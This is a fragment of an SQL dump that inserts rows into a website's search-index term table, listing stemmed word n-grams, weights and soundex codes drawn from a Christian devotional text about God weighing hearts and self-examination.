(286686, 'proverbs 16 2', 'proverb 16 2', 0, 1, 1.4333, 'P61612', 1, '*'),
(286687, 'ps.139', 'ps.139', 0, 0, 0.4, 'P200', 1, '*'),
(286688, 'ps.139 23-24', 'ps.139 23-24', 0, 1, 1.4, 'P200', 1, '*'),
(286689, 'ps.139 23-24 to', 'ps.139 23-24 to', 0, 1, 1.5, 'P230', 1, '*'),
(286690, 'ps.30', 'ps.30', 0, 0, 0.3333, 'P200', 1, '*'),
(286691, 'ps.30 56', 'ps.30 56', 0, 1, 1.2667, 'P200', 1, '*'),
(286692, 'ps.30 56 ps.40', 'ps.30 56 ps.40', 0, 1, 1.4667, 'P212', 1, '*'),
(286693, 'ps.40', 'ps.40', 0, 0, 0.3333, 'P200', 1, '*'),
(286694, 'ps.40 20-31', 'ps.40 20-31', 0, 1, 1.3667, 'P200', 1, '*'),
(286695, 'ps.40 20-31 patience', 'ps.40 20-31 patience', 0, 1, 1.6667, 'P21352', 1, '*'),
(286696, 'put yourself regularly', 'put yourself regularly', 0, 1, 1.7333, 'P3624162464', 1, '*'),
(286697, 'recognizing', 'recogn', 0, 0, 0.7333, 'R25252', 1, '*'),
(286698, 'recognizing the', 'recogn the', 0, 1, 1.5, 'R252523', 1, '*'),
(286699, 'recognizing the divine', 'recogn the divine', 0, 1, 1.7333, 'R25252315', 1, '*'),
(286700, 'regularly on', 'regularli on', 0, 1, 1.4, 'R24645', 1, '*'),
(286701, 'regularly on the', 'regularli on the', 0, 1, 1.5333, 'R246453', 1, '*'),
(286702, 'response to', 'respons to', 0, 1, 1.3667, 'R21523', 1, '*'),
(286703, 'response to evil', 'respons to evil', 0, 1, 1.5333, 'R2152314', 1, '*'),
(286704, 'samuel 2 3', 'samuel 2 3', 0, 1, 1.3333, 'S540', 1, '*'),
(286705, 'scale of', 'scale of', 0, 1, 1.2667, 'S410', 1, '*'),
(286706, 'scale of god\'s', 'scale of god', 0, 1, 1.4667, 'S41232', 1, '*'),
(286707, 'scale this', 'scale this', 0, 1, 1.3333, 'S432', 1, '*'),
(286708, 'scale this will', 'scale this will', 0, 1, 1.5, 'S4324', 1, '*'),
(286709, 'shall not be', 'shall not be', 0, 1, 1.4, 'S4531', 1, '*'),
(286710, 'should you this', 'should you this', 0, 1, 1.5, 'S432', 1, '*'),
(286711, 'sincerity', 'sincer', 0, 0, 0.6, 'S5263', 1, '*'),
(286712, 'sincerity acts', 'sincer acts', 0, 1, 1.4667, 'S5263232', 1, '*'),
(286713, 'sincerity acts 5', 'sincer acts 5', 0, 1, 1.5333, 'S5263232', 1, '*'),
(286714, 'so exceeding', 'so exceeding', 0, 1, 1.4, 'S352', 1, '*'),
(286715, 'so exceeding proudly', 'so exceeding proudly', 0, 1, 1.6667, 'S3521634', 1, '*'),
(286716, 'spirit and you', 'spirit and you', 0, 1, 1.4667, 'S16353', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(286717, 'spirits isaiah', 'spirit isaiah', 0, 1, 1.4667, 'S1632', 1, '*'),
(286718, 'spirits isaiah 26', 'spirit isaiah 26', 0, 1, 1.5667, 'S1632', 1, '*'),
(286719, 'stand and correct', 'stand and correct', 0, 1, 1.5667, 'S353532623', 1, '*'),
(286720, 'stand perfect', 'stand perfect', 0, 1, 1.4333, 'S35316123', 1, '*'),
(286721, 'stand perfect before', 'stand perfect before', 0, 1, 1.6667, 'S3531612316', 1, '*'),
(286722, 'talk no', 'talk no', 0, 1, 1.2333, 'T425', 1, '*'),
(286723, 'talk no more', 'talk no more', 0, 1, 1.4, 'T4256', 1, '*'),
(286724, 'testimony about', 'testimoni about', 0, 1, 1.5, 'T23513', 1, '*'),
(286725, 'testimony about you', 'testimoni about you', 0, 1, 1.6333, 'T23513', 1, '*'),
(286726, 'tests every', 'test every', 0, 1, 1.3667, 'T23216', 1, '*'),
(286727, 'tests every man', 'test every man', 0, 1, 1.5, 'T232165', 1, '*'),
(286728, 'tests your', 'test your', 0, 1, 1.3333, 'T2326', 1, '*'),
(286729, 'tests your attitude', 'test your attitude', 0, 1, 1.6333, 'T23263', 1, '*'),
(286730, 'tests your obedience', 'test your obedience', 0, 1, 1.6667, 'T23261352', 1, '*'),
(286731, 'tests your patience', 'test your patience', 0, 1, 1.6333, 'T23261352', 1, '*'),
(286732, 'tests your response', 'test your response', 0, 1, 1.6333, 'T23262152', 1, '*'),
(286733, 'tests your truthfulness', 'test your truthfulness', 0, 1, 1.7667, 'T23263631452', 1, '*'),
(286734, 'texts 1', 'text 1', 0, 1, 1.2333, 'T232', 1, '*'),
(286735, 'texts 1 samuel', 'text 1 samuel', 0, 1, 1.4667, 'T23254', 1, '*'),
(286736, 'that god uses', 'that god uses', 0, 1, 1.4333, 'T232', 1, '*'),
(286737, 'that god weighs', 'that god weighs', 0, 1, 1.5, 'T232', 1, '*'),
(286738, 'that may', 'that may', 0, 1, 1.2667, 'T500', 1, '*'),
(286739, 'that may be', 'that may be', 0, 1, 1.3667, 'T510', 1, '*'),
(286740, 'the divine scale', 'the divine scale', 0, 1, 1.5333, 'T1524', 1, '*'),
(286741, 'the just introduction', 'the just introduction', 0, 1, 1.7, 'T235363235', 1, '*'),
(286742, 'the just is', 'the just is', 0, 1, 1.3667, 'T232', 1, '*'),
(286743, 'the lord weigheth', 'the lord weigheth', 0, 1, 1.5667, 'T46323', 1, '*'),
(286744, 'the passage', 'the passage', 0, 1, 1.3667, 'T120', 1, '*'),
(286745, 'the passage of', 'the passage of', 0, 1, 1.4667, 'T121', 1, '*'),
(286746, 'the scale of', 'the scale of', 0, 1, 1.4, 'T241', 1, '*'),
(286747, 'the spirits', 'the spirits', 0, 1, 1.3667, 'T21632', 1, '*'),
(286748, 'the spirits isaiah', 'the spirits isaiah', 0, 1, 1.6, 'T21632', 1, '*'),
(286749, 'the untested', 'the untested', 0, 1, 1.4, 'T5323', 1, '*'),
(286750, 'the untested 2', 'the untested 2', 0, 1, 1.4667, 'T5323', 1, '*'),
(286751, 'the ways', 'the ways', 0, 1, 1.2667, 'T200', 3, '*'),
(286752, 'the ways of', 'the ways of', 0, 1, 1.3667, 'T210', 1, '*'),
(286753, 'the world josh', 'the world josh', 0, 1, 1.4667, 'T6432', 1, '*'),
(286754, 'this to', 'thi to', 0, 1, 1.2333, 'T230', 1, '*'),
(286755, 'this to stand', 'thi to stand', 0, 1, 1.4333, 'T232353', 1, '*'),
(286756, 'this will help', 'thi will help', 0, 1, 1.4667, 'T241', 1, '*'),
(286757, 'this would', 'thi would', 0, 1, 1.3333, 'T243', 1, '*'),
(286758, 'this would make', 'thi would make', 0, 1, 1.5, 'T24352', 1, '*'),
(286759, 'thou most', 'thou most', 0, 1, 1.3, 'T523', 1, '*'),
(286760, 'thou most upright', 'thou most upright', 0, 1, 1.5667, 'T5231623', 1, '*'),
(286761, 'thoughts and', 'thought and', 0, 1, 1.4, 'T23253', 1, '*'),
(286762, 'thoughts and intentions', 'thought and intentions', 0, 1, 1.7667, 'T23253535352', 1, '*'),
(286763, 'time without', 'time without', 0, 1, 1.4, 'T530', 1, '*'),
(286764, 'time without misbehaving', 'time without misbehaving', 0, 1, 1.8, 'T5352152', 1, '*'),
(286765, 'to evil', 'to evil', 0, 1, 1.2333, 'T140', 1, '*'),
(286766, 'to evil counsels', 'to evil counsels', 0, 1, 1.5333, 'T1425242', 1, '*'),
(286767, 'to examine', 'to examine', 0, 1, 1.3333, 'T250', 1, '*'),
(286768, 'to examine yourself', 'to examine yourself', 0, 1, 1.6333, 'T256241', 1, '*'),
(286769, 'to handle', 'to handle', 0, 1, 1.3, 'T534', 2, '*'),
(286770, 'to handle the', 'to handle the', 0, 1, 1.4333, 'T5343', 1, '*'),
(286771, 'to know where', 'to know where', 0, 1, 1.4333, 'T256', 1, '*'),
(286772, 'to know whether', 'to know whether', 0, 1, 1.5, 'T2536', 1, '*'),
(286773, 'to know your', 'to know your', 0, 1, 1.4, 'T256', 1, '*'),
(286774, 'to money', 'to money', 0, 1, 1.2667, 'T500', 1, '*'),
(286775, 'to money and', 'to money and', 0, 1, 1.4, 'T530', 1, '*'),
(286776, 'to stand perfect', 'to stand perfect', 0, 1, 1.5333, 'T235316123', 1, '*'),
(286777, 'to the lord', 'to the lord', 0, 1, 1.3667, 'T463', 1, '*'),
(286778, 'to weigh', 'to weigh', 0, 1, 1.2667, 'T200', 1, '*'),
(286779, 'to weigh yourself', 'to weigh yourself', 0, 1, 1.5667, 'T26241', 1, '*'),
(286780, 'trust the', 'trust the', 0, 1, 1.3, 'T623', 1, '*'),
(286781, 'trust the untested', 'trust the untested', 0, 1, 1.6, 'T6235323', 1, '*'),
(286782, 'truthfulness', 'truth', 0, 0, 0.8, 'T631452', 1, '*'),
(286783, 'truthfulness and', 'truth and', 0, 1, 1.5333, 'T63145253', 1, '*'),
(286784, 'truthfulness and sincerity', 'truth and sincerity', 0, 1, 1.8667, 'T6314525325263', 1, '*'),
(286785, 'untested', 'untest', 0, 0, 0.5333, 'U5323', 1, '*'),
(286786, 'untested 2', 'untest 2', 0, 1, 1.3333, 'U5323', 1, '*'),
(286787, 'untested 2 he', 'untest 2 he', 0, 1, 1.4333, 'U5323', 1, '*'),
(286788, 'upright dost', 'upright dost', 0, 1, 1.4, 'U162323', 1, '*'),
(286789, 'upright dost weigh', 'upright dost weigh', 0, 1, 1.6, 'U1623232', 1, '*'),
(286790, 'uprightness', 'upright', 0, 0, 0.7333, 'U162352', 1, '*'),
(286791, 'uprightness thou', 'upright thou', 0, 1, 1.5333, 'U1623523', 1, '*'),
(286792, 'uprightness thou most', 'upright thou most', 0, 1, 1.7, 'U1623523523', 1, '*'),
(286793, 'us christians', 'us christians', 0, 1, 1.4333, 'U262352', 1, '*'),
(286794, 'us christians to', 'us christians to', 0, 1, 1.5333, 'U2623523', 1, '*'),
(286795, 'uses', 'us', 0, 0, 0.2667, 'U200', 1, '*'),
(286796, 'uses for', 'us for', 0, 1, 1.2667, 'U216', 1, '*'),
(286797, 'uses for us', 'us for us', 0, 1, 1.3667, 'U2162', 1, '*'),
(286798, 'walking conscious', 'walk conscious', 0, 1, 1.5667, 'W425252', 1, '*'),
(286799, 'walking conscious of', 'walk conscious of', 0, 1, 1.6667, 'W4252521', 1, '*'),
(286800, 'wanting in', 'want in', 0, 1, 1.3333, 'W53525', 1, '*'),
(286801, 'wanting in jesus\'', 'want in jesus', 0, 1, 1.5667, 'W535252', 1, '*'),
(286802, 'way of the', 'wai of the', 0, 1, 1.3333, 'W130', 1, '*'),
(286803, 'ways of', 'wai of', 0, 1, 1.2333, 'W210', 1, '*'),
(286804, 'ways of a', 'wai of a', 0, 1, 1.3, 'W210', 1, '*'),
(286805, 'we do', 'we do', 0, 1, 1.1667, 'W300', 1, '*'),
(286806, 'we do before', 'we do before', 0, 1, 1.4, 'W316', 1, '*'),
(286807, 'weigh', 'weigh', 0, 0, 0.3333, 'W200', 1, '*'),
(286808, 'weigh the', 'weigh the', 0, 1, 1.3, 'W230', 1, '*'),
(286809, 'weigh the path', 'weigh the path', 0, 1, 1.4667, 'W2313', 1, '*'),
(286810, 'weigh yourself', 'weigh yourself', 0, 1, 1.4667, 'W26241', 1, '*'),
(286811, 'weigh yourself on', 'weigh yourself on', 0, 1, 1.5667, 'W262415', 1, '*'),
(286812, 'weigheth', 'weigheth', 0, 0, 0.5333, 'W230', 1, '*'),
(286813, 'weigheth the', 'weigheth the', 0, 1, 1.4, 'W230', 1, '*'),
(286814, 'weigheth the spirits', 'weigheth the spirits', 0, 1, 1.6667, 'W2321632', 1, '*'),
(286815, 'weighs actions', 'weigh actions', 0, 1, 1.4667, 'W2352', 1, '*'),
(286816, 'weighs actions thoughts', 'weigh actions thoughts', 0, 1, 1.7667, 'W23523232', 1, '*'),
(286817, 'where you stand', 'where you stand', 0, 1, 1.5, 'W62353', 1, '*'),
(286818, 'will expressed', 'will expressed', 0, 1, 1.4667, 'W421623', 1, '*'),
(286819, 'will expressed in', 'will expressed in', 0, 1, 1.5667, 'W4216235', 1, '*'),
(286820, 'without misbehaving', 'without misbehaving', 0, 1, 1.6333, 'W352152', 1, '*'),
(286821, 'without misbehaving 3', 'without misbehaving 3', 0, 1, 1.7, 'W352152', 1, '*'),
(286822, 'witness before', 'wit before', 0, 1, 1.4667, 'W35216', 1, '*'),
(286823, 'witness before god', 'wit before god', 0, 1, 1.6, 'W3521623', 1, '*'),
(286824, 'word and by', 'word and by', 0, 1, 1.3667, 'W63531', 1, '*'),
(286825, 'world josh', 'world josh', 0, 1, 1.3333, 'W6432', 1, '*'),
(286826, 'world josh 7', 'world josh 7', 0, 1, 1.4, 'W6432', 1, '*'),
(286827, 'would make', 'would make', 0, 1, 1.3333, 'W4352', 1, '*'),
(286828, 'would make you', 'would make you', 0, 1, 1.4667, 'W4352', 1, '*'),
(286829, 'you 1cor.11', 'you 1cor.11', 0, 1, 1.3667, 'Y260', 1, '*'),
(286830, 'you 1cor.11 31', 'you 1cor.11 31', 0, 1, 1.4667, 'Y260', 1, '*'),
(286831, 'you 1sam.16', 'you 1sam.16', 0, 1, 1.3667, 'Y250', 1, '*'),
(286832, 'you 1sam.16 7', 'you 1sam.16 7', 0, 1, 1.4333, 'Y250', 1, '*'),
(286833, 'you are on', 'you are on', 0, 1, 1.3333, 'Y650', 1, '*'),
(286834, 'you put yourself', 'you put yourself', 0, 1, 1.5333, 'Y136241', 1, '*'),
(286835, 'you shall not', 'you shall not', 0, 1, 1.4333, 'Y2453', 1, '*'),
(286836, 'you stand and', 'you stand and', 0, 1, 1.4333, 'Y235353', 1, '*'),
(286837, 'you this to', 'you this to', 0, 1, 1.3667, 'Y323', 1, '*'),
(286838, 'your attitude to', 'your attitude to', 0, 1, 1.5333, 'Y630', 1, '*'),
(286839, 'your eternal', 'your eternal', 0, 1, 1.4, 'Y63654', 1, '*'),
(286840, 'your eternal destination', 'your eternal destination', 0, 1, 1.8, 'Y63654323535', 1, '*'),
(286841, 'your mouth for', 'your mouth for', 0, 1, 1.4667, 'Y65316', 1, '*'),
(286842, 'your obedience 1sam.15-21-22', 'your obedience 1sam.15-21-22', 0, 1, 1.9333, 'Y613525', 1, '*'),
(286843, 'your patience', 'your patience', 0, 1, 1.4333, 'Y61352', 1, '*'),
(286844, 'your patience isaiah', 'your patience isaiah', 0, 1, 1.6667, 'Y61352', 1, '*'),
(286845, 'your response', 'your response', 0, 1, 1.4333, 'Y62152', 1, '*'),
(286846, 'your response to', 'your response to', 0, 1, 1.5333, 'Y621523', 1, '*'),
(286847, 'your truthfulness', 'your truthfulness', 0, 1, 1.5667, 'Y63631452', 1, '*'),
(286848, 'your truthfulness and', 'your truthfulness and', 0, 1, 1.7, 'Y6363145253', 1, '*'),
(286849, 'yourself 2cor13', 'yourself 2cor13', 0, 1, 1.5, 'Y624126', 1, '*'),
(286850, 'yourself 2cor13 5', 'yourself 2cor13 5', 0, 1, 1.5667, 'Y624126', 1, '*'),
(286851, 'yourself god', 'yourself god', 0, 1, 1.4, 'Y624123', 1, '*'),
(286852, 'yourself god does', 'yourself god does', 0, 1, 1.5667, 'Y6241232', 1, '*'),
(286853, 'yourself regularly', 'yourself regularly', 0, 1, 1.6, 'Y624162464', 1, '*'),
(286854, 'yourself regularly on', 'yourself regularly on', 0, 1, 1.7, 'Y6241624645', 1, '*'),
(287293, '1 15-17', '1 15-17', 0, 1, 1.2333, '', 1, '*'),
(287294, '1 15-17 rom.6', '1 15-17 rom.6', 0, 1, 1.4333, 'R500', 1, '*'),
(287295, '1-12', '1-12', 0, 0, 0.4, '', 1, '*'),
(287296, '1-12 they', '1-12 they', 0, 1, 1.3, 'T000', 1, '*'),
(287297, '1-12 they became', '1-12 they became', 0, 1, 1.5333, 'T125', 1, '*'),
(287298, '1-2 then', '1-2 then', 0, 1, 1.2667, 'T500', 1, '*'),
(287299, '1-2 then you\'ll', '1-2 then you', 0, 1, 1.5, 'T540', 1, '*'),
(287300, '1-27', '1-27', 0, 0, 0.4, '', 1, '*'),
(287301, '1-27 he', '1-27 he', 0, 1, 1.2333, 'H000', 1, '*'),
(287302, '1-27 he could', '1-27 he could', 0, 1, 1.4333, 'H243', 1, '*'),
(287303, '12 1sam', '12 1sam', 0, 1, 1.2333, 'S500', 1, '*'),
(287304, '12 1sam 6', '12 1sam 6', 0, 1, 1.3, 'S500', 1, '*'),
(287305, '13 5', '13 5', 0, 1, 1.1333, '', 1, '*'),
(287306, '13 5 prov.6', '13 5 prov.6', 0, 1, 1.3667, 'P610', 1, '*'),
(287307, '13-16 by', '13-16 by', 0, 1, 1.2667, 'B000', 1, '*'),
(287308, '13-16 by what', '13-16 by what', 0, 1, 1.4333, 'B300', 1, '*'),
(287309, '15-17', '15-17', 0, 0, 0.5, '', 1, '*'),
(287310, '15-17 rom.6', '15-17 rom.6', 0, 1, 1.3667, 'R500', 1, '*'),
(287311, '15-17 rom.6 12', '15-17 rom.6 12', 0, 1, 1.4667, 'R500', 1, '*'),
(287312, '1cor.11 30', '1cor.11 30', 0, 1, 1.3333, 'C600', 1, '*'),
(287313, '1cor.11 30 examine', '1cor.11 30 examine', 0, 1, 1.6, 'C625', 1, '*'),
(287314, '1cor.9', '1cor.9', 0, 0, 0.4, 'C600', 1, '*'),
(287315, '1cor.9 1-27', '1cor.9 1-27', 0, 1, 1.3667, 'C600', 1, '*'),
(287316, '1cor.9 1-27 he', '1cor.9 1-27 he', 0, 1, 1.4667, 'C600', 1, '*'),
(287317, '1sam 6', '1sam 6', 0, 1, 1.2, 'S500', 1, '*'),
(287318, '1sam 6 7', '1sam 6 7', 0, 1, 1.2667, 'S500', 1, '*'),
(287319, '1sam.12', '1sam.12', 0, 0, 0.4667, 'S500', 1, '*'),
(287320, '1sam.12 3-5', '1sam.12 3-5', 0, 1, 1.3667, 'S500', 1, '*'),
(287321, '1sam.12 3-5 samuel', '1sam.12 3-5 samuel', 0, 1, 1.6, 'S5254', 1, '*'),
(287322, '2 cor 13', '2 cor 13', 0, 1, 1.2667, 'C600', 1, '*'),
(287323, '2 is', '2 is', 0, 1, 1.1333, 'I200', 1, '*'),
(287324, '2 is 1', '2 is 1', 0, 1, 1.2, 'I200', 1, '*'),
(287325, '3-5 samuel', '3-5 samuel', 0, 1, 1.3333, 'S540', 1, '*'),
(287326, '3-5 samuel could', '3-5 samuel could', 0, 1, 1.5333, 'S54243', 1, '*'),
(287327, '30 examine', '30 examine', 0, 1, 1.3333, 'E250', 1, '*'),
(287328, '30 examine yourself', '30 examine yourself', 0, 1, 1.6333, 'E256241', 1, '*'),
(287329, '40 examples', '40 examples', 0, 1, 1.3667, 'E25142', 1, '*'),
(287330, '40 examples of', '40 examples of', 0, 1, 1.4667, 'E251421', 1, '*'),
(287331, '5 prov.6', '5 prov.6', 0, 1, 1.2667, 'P610', 1, '*'),
(287332, '5 prov.6 2', '5 prov.6 2', 0, 1, 1.3333, 'P610', 1, '*'),
(287333, '6 7', '6 7', 0, 1, 1.1, '', 1, '*'),
(287334, '6 7 introduction', '6 7 introduction', 0, 1, 1.5333, 'I5363235', 1, '*'),
(287335, '7 introduction', '7 introduction', 0, 1, 1.4667, 'I5363235', 1, '*'),
(287336, '7 introduction always', '7 introduction always', 0, 1, 1.7, 'I536323542', 1, '*'),
(287337, 'a blameless', 'a blameless', 0, 1, 1.3667, 'A14542', 1, '*'),
(287338, 'a blameless manner', 'a blameless manner', 0, 1, 1.6, 'A1454256', 1, '*'),
(287339, 'a man acceptable', 'a man acceptable', 0, 1, 1.5333, 'A521314', 1, '*'),
(287340, 'a people that', 'a people that', 0, 1, 1.4333, 'A143', 1, '*'),
(287341, 'a true man', 'a true man', 0, 1, 1.3333, 'A365', 1, '*'),
(287342, 'above the kingdom', 'abov the kingdom', 0, 1, 1.5667, 'A1325235', 1, '*'),
(287343, 'acceptable etc', 'accept etc', 0, 1, 1.4667, 'A2131432', 1, '*'),
(287344, 'acceptable etc let\'s', 'accept etc let', 0, 1, 1.6667, 'A2131432432', 1, '*'),
(287345, 'according to eph.2', 'accord to eph.2', 0, 1, 1.6, 'A2635231', 1, '*'),
(287346, 'according to god\'s', 'accord to god', 0, 1, 1.6, 'A263523232', 1, '*'),
(287347, 'all testified', 'all testified', 0, 1, 1.4333, 'A432313', 1, '*'),
(287348, 'all testified that', 'all testified that', 0, 1, 1.6, 'A432313', 1, '*'),
(287349, 'already by', 'alreadi by', 0, 1, 1.3333, 'A4631', 1, '*'),
(287350, 'already by the', 'alreadi by the', 0, 1, 1.4667, 'A46313', 1, '*'),
(287351, 'always put', 'alwai put', 0, 1, 1.3333, 'A4213', 1, '*'),
(287352, 'always put it', 'alwai put it', 0, 1, 1.4333, 'A4213', 1, '*'),
(287353, 'and balances', 'and balances', 0, 1, 1.4, 'A531452', 1, '*'),
(287354, 'and balances mean', 'and balances mean', 0, 1, 1.5667, 'A5314525', 1, '*'),
(287355, 'and he is', 'and he is', 0, 1, 1.3, 'A532', 1, '*'),
(287356, 'and human', 'and human', 0, 1, 1.3, 'A535', 1, '*'),
(287357, 'and human examples', 'and human examples', 0, 1, 1.6, 'A53525142', 1, '*'),
(287358, 'and measured', 'and measured', 0, 1, 1.4, 'A535263', 1, '*'),
(287359, 'and measured up', 'and measured up', 0, 1, 1.5, 'A5352631', 1, '*'),
(287360, 'and ministry', 'and ministry', 0, 1, 1.4, 'A535236', 1, '*'),
(287361, 'and ministry everything', 'and ministry everything', 0, 1, 1.7667, 'A53523616352', 1, '*'),
(287362, 'and style', 'and style', 0, 1, 1.3, 'A53234', 1, '*'),
(287363, 'and style the', 'and style the', 0, 1, 1.4333, 'A532343', 1, '*'),
(287364, 'and the voice', 'and the voice', 0, 1, 1.4333, 'A5312', 1, '*'),
(287365, 'and they all', 'and they all', 0, 1, 1.4, 'A534', 1, '*'),
(287366, 'and your rule', 'and your rule', 0, 1, 1.4333, 'A5364', 1, '*'),
(287367, 'anywhere when', 'anywher when', 0, 1, 1.4333, 'A565', 1, '*'),
(287368, 'anywhere when god', 'anywher when god', 0, 1, 1.5667, 'A56523', 1, '*'),
(287369, 'are satanically', 'ar satanically', 0, 1, 1.5, 'A623524', 1, '*'),
(287370, 'are satanically inspired', 'ar satanically inspired', 0, 1, 1.8, 'A62352452163', 1, '*'),
(287371, 'at lived', 'at lived', 0, 1, 1.2667, 'A3413', 1, '*'),
(287372, 'at lived their', 'at lived their', 0, 1, 1.4667, 'A34136', 1, '*'),
(287373, 'balances', 'balanc', 0, 0, 0.5333, 'B452', 1, '*'),
(287374, 'balances mean', 'balanc mean', 0, 1, 1.4333, 'B4525', 1, '*'),
(287375, 'balances mean justice', 'balanc mean justice', 0, 1, 1.7, 'B4525232', 1, '*'),
(287376, 'be judged', 'be judged', 0, 1, 1.3, 'B2323', 1, '*'),
(287377, 'be judged 1cor.11', 'be judged 1cor.11', 0, 1, 1.5667, 'B232326', 1, '*'),
(287378, 'be obedient', 'be obedient', 0, 1, 1.3667, 'B353', 1, '*'),
(287379, 'be obedient to', 'be obedient to', 0, 1, 1.4667, 'B353', 1, '*'),
(287380, 'be the standard', 'be the standard', 0, 1, 1.5, 'B3235363', 1, '*'),
(287381, 'became god\'s', 'becam god', 0, 1, 1.4, 'B25232', 1, '*'),
(287382, 'became god\'s example', 'becam god example', 0, 1, 1.6667, 'B25232514', 1, '*'),
(287383, 'before god now', 'befor god now', 0, 1, 1.4667, 'B6235', 1, '*'),
(287384, 'before god paul', 'befor god paul', 0, 1, 1.5, 'B62314', 1, '*'),
(287385, 'before the nation', 'befor the nation', 0, 1, 1.5667, 'B63535', 1, '*'),
(287386, 'before them opened', 'befor them opened', 0, 1, 1.6, 'B635153', 1, '*'),
(287387, 'being straight qualities', 'be straight qualities', 0, 1, 1.8, 'B5236232432', 1, '*'),
(287388, 'blameless', 'blameless', 0, 0, 0.6, 'B4542', 1, '*'),
(287389, 'blameless manner', 'blameless manner', 0, 1, 1.5333, 'B454256', 1, '*'),
(287390, 'blameless manner carefully', 'blameless manner carefully', 0, 1, 1.8667, 'B4542562614', 1, '*'),
(287391, 'bring god\'s', 'bring god', 0, 1, 1.3667, 'B65232', 1, '*'),
(287392, 'bring god\'s word', 'bring god word', 0, 1, 1.5333, 'B6523263', 1, '*'),
(287393, 'by the lord\'s', 'by the lord', 0, 1, 1.4333, 'B34632', 1, '*'),
(287394, 'by what', 'by what', 0, 1, 1.2333, 'B300', 1, '*'),
(287395, 'by what they', 'by what they', 0, 1, 1.4, 'B300', 1, '*'),
(287396, 'carefully labouring', 'carefulli labouring', 0, 1, 1.6333, 'C6141652', 1, '*'),
(287397, 'carefully labouring with', 'carefulli labouring with', 0, 1, 1.8, 'C61416523', 1, '*'),
(287398, 'choose the', 'choos the', 0, 1, 1.3333, 'C300', 1, '*'),
(287399, 'choose the pleasure', 'choos the pleasure', 0, 1, 1.6333, 'C31426', 1, '*'),
(287400, 'christ his', 'christ his', 0, 1, 1.3333, 'C6232', 1, '*'),
(287401, 'christ his life', 'christ his life', 0, 1, 1.5, 'C623241', 1, '*'),
(287402, 'compromise whatsoever', 'compromis whatsoever', 0, 1, 1.7, 'C516523216', 1, '*'),
(287403, 'compromise whatsoever rechabites', 'compromis whatsoever rechabites', 0, 1, 2, 'C5165232162132', 1, '*'),
(287404, 'conclude', 'conclud', 0, 0, 0.5333, 'C5243', 1, '*'),
(287405, 'conclude that', 'conclud that', 0, 1, 1.4333, 'C5243', 1, '*'),
(287406, 'conclude that he', 'conclud that he', 0, 1, 1.5333, 'C5243', 1, '*'),
(287407, 'confidently talk', 'confid talk', 0, 1, 1.5333, 'C513534342', 1, '*'),
(287408, 'confidently talk of', 'confid talk of', 0, 1, 1.6333, 'C5135343421', 1, '*'),
(287409, 'conscience correct', 'conscienc correct', 0, 1, 1.6, 'C5252623', 1, '*'),
(287410, 'conscience correct standard', 'conscienc correct standard', 0, 1, 1.9, 'C5252623235363', 1, '*'),
(287411, 'conscience nor', 'conscienc nor', 0, 1, 1.4667, 'C525256', 1, '*'),
(287412, 'conscience nor choose', 'conscienc nor choose', 0, 1, 1.7, 'C5252562', 1, '*'),
(287413, 'cor 13', 'cor 13', 0, 1, 1.2, 'C600', 1, '*'),
(287414, 'cor 13 5', 'cor 13 5', 0, 1, 1.2667, 'C600', 1, '*'),
(287415, 'correct standard', 'correct standard', 0, 1, 1.5333, 'C623235363', 1, '*'),
(287416, 'correct standard being', 'correct standard being', 0, 1, 1.7333, 'C623235363152', 1, '*'),
(287417, 'could confidently', 'could confidently', 0, 1, 1.5667, 'C432513534', 1, '*'),
(287418, 'could confidently talk', 'could confidently talk', 0, 1, 1.7333, 'C432513534342', 1, '*'),
(287419, 'could measure', 'could measure', 0, 1, 1.4333, 'C43526', 1, '*'),
(287420, 'could measure up', 'could measure up', 0, 1, 1.5333, 'C435261', 1, '*'),
(287421, 'could talk', 'could talk', 0, 1, 1.3333, 'C4342', 1, '*'),
(287422, 'could talk of', 'could talk of', 0, 1, 1.4333, 'C43421', 1, '*'),
(287423, 'demands and', 'demand and', 0, 1, 1.3667, 'D53253', 1, '*'),
(287424, 'demands and human', 'demand and human', 0, 1, 1.5667, 'D532535', 1, '*'),
(287425, 'didn\'t live', 'didn live', 0, 1, 1.3667, 'D5341', 1, '*'),
(287426, 'didn\'t live to', 'didn live to', 0, 1, 1.4667, 'D53413', 1, '*'),
(287427, 'difficult to conclude', 'difficult to conclude', 0, 1, 1.7, 'D124325243', 1, '*'),
(287428, 'done in a', 'done in a', 0, 1, 1.3, 'D500', 1, '*'),
(287429, 'e weighs', 'e weighs', 0, 1, 1.2667, 'E200', 1, '*'),
(287430, 'e weighs less', 'e weighs less', 0, 1, 1.4333, 'E242', 1, '*'),
(287431, 'either passes', 'either passes', 0, 1, 1.4333, 'E3612', 1, '*'),
(287432, 'either passes or', 'either passes or', 0, 1, 1.5333, 'E36126', 1, '*'),
(287433, 'eph.2', 'eph.2', 0, 0, 0.3333, 'E100', 1, '*'),
(287434, 'eph.2 1-2', 'eph.2 1-2', 0, 1, 1.3, 'E100', 1, '*'),
(287435, 'eph.2 1-2 then', 'eph.2 1-2 then', 0, 1, 1.4667, 'E135', 1, '*'),
(287436, 'etc let\'s', 'etc let', 0, 1, 1.3, 'E32432', 1, '*'),
(287437, 'etc let\'s see', 'etc let see', 0, 1, 1.4333, 'E32432', 1, '*'),
(287438, 'eternity make', 'etern make', 0, 1, 1.4333, 'E365352', 1, '*'),
(287439, 'eternity make god\'s', 'etern make god', 0, 1, 1.6333, 'E36535232', 1, '*'),
(287440, 'everything done', 'everyth done', 0, 1, 1.5, 'E1635235', 1, '*'),
(287441, 'everything done in', 'everyth done in', 0, 1, 1.6, 'E1635235', 1, '*'),
(287442, 'examine yourself if', 'examin yourself if', 0, 1, 1.6333, 'E256241', 1, '*'),
(287443, 'example of a', 'exampl of a', 0, 1, 1.4, 'E25141', 1, '*'),
(287444, 'examples', 'exampl', 0, 0, 0.5333, 'E25142', 1, '*'),
(287445, 'examples of', 'exampl of', 0, 1, 1.3667, 'E251421', 1, '*'),
(287446, 'examples of people', 'exampl of people', 0, 1, 1.6, 'E2514214', 1, '*'),
(287447, 'examples of weights', 'exampl of weights', 0, 1, 1.6333, 'E251421232', 1, '*'),
(287448, 'examples some', 'exampl some', 0, 1, 1.4333, 'E251425', 1, '*'),
(287449, 'examples some of', 'exampl some of', 0, 1, 1.5333, 'E2514251', 1, '*'),
(287450, 'expected and', 'expect and', 0, 1, 1.4, 'E212353', 1, '*'),
(287451, 'expected and he', 'expect and he', 0, 1, 1.5, 'E212353', 1, '*'),
(287452, 'fashion and', 'fashion and', 0, 1, 1.3667, 'F253', 1, '*'),
